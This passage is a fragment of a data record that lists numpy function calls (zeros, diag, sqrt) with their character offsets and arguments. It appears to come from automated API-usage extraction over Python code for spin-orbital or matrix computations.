] | [((577, 595), 'numpy.zeros', 'np.zeros', (['(3 * S,)'], {}), '((3 * S,))\n', (585, 595), True, 'import numpy as np\n'), ((1132, 1171), 'numpy.zeros', 'np.zeros', (['((self.num_spin_orbitals,) * 4)'], {}), '((self.num_spin_orbitals,) * 4)\n', (1140, 1171), True, 'import numpy as np\n'), ((3642, 3660), 'numpy.zeros', 'np.zeros', (['((n,) * 2)'], {}), '((n,) * 2)\n', (3650, 3660), True, 'import numpy as np\n'), ((4091, 4113), 'numpy.zeros', 'np.zeros', (['num_elements'], {}), '(num_elements)\n', (4099, 4113), True, 'import numpy as np\n'), ((3840, 3853), 'numpy.diag', 'np.diag', (['utri'], {}), '(utri)\n', (3847, 3853), True, 'import numpy as np\n'), ((4462, 4483), 'numpy.sqrt', 'np.sqrt', (['mat.shape[0]'], {}), '(mat.shape[0])\n', (4469, 4483), True, 'import numpy as np\n'), ((5009, 5022), 'numpy.diag', 'np.diag', (['utri'], {}), '(utri)\n', (5016, 5022), True, 'import numpy as np\n')] |